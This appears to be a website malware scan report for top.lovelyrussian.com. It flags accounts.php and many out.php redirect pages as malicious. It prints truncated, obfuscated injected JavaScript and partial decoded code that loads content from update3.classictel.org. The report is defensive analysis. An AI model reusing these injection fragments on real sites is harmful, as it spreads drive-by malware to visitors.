Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=top.lovelyrussian.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://top.lovelyrussian.com/ | 200 OK Content-Length: 92092 Content-Type: text/html | clean |
http://top.lovelyrussian.com/accounts.php | 200 OK Content-Length: 28216 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Obfuscated script as found in the page (excerpt, cut off at the end): document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20aj%28Af%29%7Breturn%20Af%7Dtry%7Bfunction%20Oe%28KD%29%7Breturn%20parseInt%28KD%29%7Dvar%20Jw%3D%2755v5Mv5ev58v5fv5nv5Uv5Vv57v5Iv5jv5pv5Av5sv59v5Zv5qv5cv5Cv54v53v56v5Gv5Yv5mv5yv5Fv5Nv5Hv5Lv5Pv5xv5gv5dv5lv5rv5hv5Tv5wv5zv5Rv5Ov5Dv5ov5Xv5tv5iv5kv5av5Sv5bv5Jv5Wv5BvM5vMMvMevM8vMfvMnvMUvMVvM7vMIvMjvMpvMAvMsvM9vMZvMqvMcvMCvM4vM3vM6vMGvMY%27%2C%20Fi%3Daj%28%27v%27%29%3B%20var%20SV%3DArray%28Oe%28%2775%27%29%2COe%28%274%27%29%2C23473%5E [...]
Decoded script (excerpt; part of install() is missing after "var s", and the listing then repeats from the start and is cut off): function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'udetpaX', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s [...] for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'udetpaX', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 [...]
Note: the decoded fields name a remote host ('update3.classictel.org', path '/drivers/') and a marker cookie ('udetpaX') that setCookie() expires after 86400000 ms (24 hours); install() runs only when alreadyInstalled() is false, so the cookie appears to limit the script to one run per browser per day. The object name suggests iframe injection, but the code that would use the host is not part of this excerpt.
Antivirus reports:
| ||
http://top.lovelyrussian.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://top.lovelyrussian.com/accounts.php?login | 200 OK Content-Length: 28216 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20aj%28Af%29%7Breturn%20Af%7Dtry%7Bfunction%20Oe%28KD%29%7Breturn%20parseInt%28KD%29%7Dvar%20Jw%3D%2755v5Mv5ev58v5fv5nv5Uv5Vv57v5Iv5jv5pv5Av5sv59v5Zv5qv5cv5Cv54v53v56v5Gv5Yv5mv5yv5Fv5Nv5Hv5Lv5Pv5xv5gv5dv5lv5rv5hv5Tv5wv5zv5Rv5Ov5Dv5ov5Xv5tv5iv5kv5av5Sv5bv5Jv5Wv5BvM5vMMvMevM8vMfvMnvMUvMVvM7vMIvMjvMpvMAvMsvM9vMZvMqvMcvMCvM4vM3vM6vMGvMY%27%2C%20Fi%3Daj%28%27v%27%29%3B%20var%20SV%3DArray%28Oe%28%2775%27%29%2COe%28%274%27%29%2C23473%5E Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'udetpaX', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'udetpaX', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=Lapa&url=http%3A%2F%2Flapatulka.net | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Obfuscated script as found in the page (excerpt, cut off at the end): document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 [...]
Decoded script (excerpt; part of install() is missing after "var s", and the listing then repeats from the start and is cut off): function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s [...] for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 [...]
Note: the decoded script has the same host ('update3.classictel.org') and path ('/drivers/') as the accounts.php sample, but a different marker cookie name ('dXeputa' here, 'udetpaX' there) and different obfuscated identifiers, so the host and path are the stable indicators across the two samples; the cookie name and the encoded wrapper are not.
Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=janosch&url=http%3A%2F%2Fwww.cobradvds.com | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=topruss&url=http%3A%2F%2Ftop.russian-mail-order-bride.net%2F | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=dating1&url=http%3A%2F%2Fwww.worldwidetopsites.com%2Fphp%2Fin.php%3Fid%3Dlove44 | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=gero4054&url=http%3A%2F%2Fgallerydating.net | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=world100&url=http%3A%2F%2Fwww.world100.net | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=dati2233&url=http%3A%2F%2Ftop100.wdating.com%2Frankem.asp%3Faction%3Din%26id%3Dbestl | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=AmnaUsma&url=http%3A%2F%2Fwww.activeattractions.com | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=rom100&url=http%3A%2F%2Fonline4romance.com%2Ftopsites | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=dating77&url=http%3A%2F%2Frussian-women-top.whoo.net%3Fwhoo%3D52443800 | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
| ||
http://top.lovelyrussian.com/out.php?id=lucky&url=http%3A%2F%2Fwww.lucky-you.com%2F | 200 OK Content-Length: 5106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3Eif%28VpF%21%3D1%29%7Bfunction%20AZ%28jy%29%7Breturn%20jy%7Dtry%7Bfunction%20rvQ%28mcu%29%7Breturn%20parseInt%28mcu%29%7Dvar%20ymv%3D%27XX0Xl0XS0X90Xs0Xh0X70Xf0XU0XO0Xz0XC0XM0X50XJ0XD0Xk0XL0XK0Xq0Xx0XR0XP0X30Xc0XZ0Xt0Xw0XT0Xb0Xi0X40XF0X80Xy0XA0Xj0XB0XN0XY0Xo0XG0XI0XW0Xm0Xd0XV0XH0X60Xe0Xr0Xa0Xg0Xp0lX0ll0lS0l90ls0lh0l70lf0lU0lO0lz0lC0lM0l50lJ0lD0lk0lL0lK0lq0lx0lR0lP0l3%27%3B%20var%20JBF%3Dymv.substr%282%2C1%29%2C%20yKt%3DArray%2826039%5E25949%2CrvQ%28%27165%27%2 Decoded script: function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString(); }, install : function() { if(!this.alreadyInstalled()) { var s for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1); return o; } } var o = new IFrame(); o.install(); function IFrame(){} IFrame.prototype = { host : 'update3.classictel.org', path : '/drivers/', cookieName : 'dXeputa', cookieValue : 1, setCookie : function(name, value) { var d= new Date(); d.setTime(new Date().getTime() + 8 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: top.lovelyrussian.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Tue, 20 Jan 2015 18:13:25 GMT
Accept-Ranges: bytes
ETag: "620c26e0-167bc-50d1365598a57"
Server: Apache
Vary: Accept-Encoding
Content-Length: 92092
Content-Type: text/html; charset=windows-1251
Expires: Tue, 20 Jan 2015 18:13:25 GMT
Last-Modified: Tue, 20 Jan 2015 11:03:59 GMT
...92092 bytes of data.
GET / HTTP/1.1
Host: top.lovelyrussian.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Tue, 20 Jan 2015 18:13:25 GMT
Accept-Ranges: bytes
ETag: "620c26e0-167bc-50d1365598a57"
Server: Apache
Vary: Accept-Encoding
Content-Length: 92092
Content-Type: text/html; charset=windows-1251
Expires: Tue, 20 Jan 2015 18:13:25 GMT
Last-Modified: Tue, 20 Jan 2015 11:03:59 GMT
...92092 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: top.lovelyrussian.com
Referer: http://www.google.com/search?q=top.lovelyrussian.com
Result:
The result is similar to that of the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: top.lovelyrussian.com
Referer: http://www.google.com/search?q=top.lovelyrussian.com
Result:
The result is similar to that of the first query. No suspicious redirects were found.